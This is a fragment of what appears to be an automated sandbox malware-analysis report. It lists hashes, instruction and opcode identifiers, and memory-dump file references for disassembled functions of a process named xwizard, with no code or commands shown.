                                                                                      • Instruction ID: ff0b5460fa5dc5610cf1d2d6d8c9036e395af9cd8b83a670e2a4c1f1e99d862a
                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction Fuzzy Hash: F1918271E202169BDF3CDE69C881ABEB7B5EF44720F54491AE865EB3C0E730A9418761
                                                                                      Function 04799126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                      • Instruction ID: f863d8b42fb40ff9630054135117c4f3dbed7dbff1843afedba06ef8e3ea0fad
                                                                                      • Opcode Fuzzy Hash: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                      • Instruction Fuzzy Hash: 3A810AB1D002699BDB35CB54CC45BEAB7B4AB48714F0045DAEA19B7780E731AE84DFA0